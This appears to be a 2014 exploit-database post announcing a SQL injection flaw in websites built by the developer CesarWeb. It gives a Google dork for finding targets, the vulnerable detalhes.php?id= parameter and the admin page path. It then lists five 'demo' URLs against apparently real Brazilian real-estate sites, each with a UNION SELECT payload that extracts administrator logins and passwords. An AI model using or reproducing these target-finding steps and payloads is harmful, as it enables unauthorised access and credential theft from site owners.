$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
# Exploit Title : Powred by cesarwebsites SQL injection vulnerability
# Exploit Author : Cyber Hacker
# Vendor Homepage : http://cesarweb.com.br/
# Google Dork : inurl:detalhes.php?id= & intext:CesarWeb.com.br
# Date: 2014-1-13
# Tested on: Windows 7 / Mozilla Firefox
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
# Location : localhost/detalhes.php?id=[Sql Injection]
# Admin Page: localhost/manutencao/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Demo:
http://www.andreamXartinsimoveis.com.br/detalhes.php?id=-60+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,login,senha,12,13,14,15,16,17,18,19,20,21+from+administracao--+
http://www.marcoagXualuzaimoveis.com.br/detalhes.php?id=-258+/*!50000UNION*/+/*!50000SELECT*/+%201,2,3,4,5,6,senha,8,9,10,11,12,login,14,15,16,17,18+from+administracao--+
http://www.jeffersoXnbuitragoimoveis.com.br/detalhes.php?id=-186+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,senha,login,14,15,16,17,18,19,20,21,22+from+administracao--+
http://www.aloizioiXmoveis.com.br/detalhes.php?id=-93+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,senha,14,15,16,17,18+from+administracao--+
http://www.aluguelfixoXcabofrio.com.br/detalhes.php?id=-93+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,senha,12,login,14,15,16,17,18,19,20,21+from+administracao--+
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# discovered by : CyberHacker #
# Greets to: Milad Hacking, Eb051, hossein19123
#
######################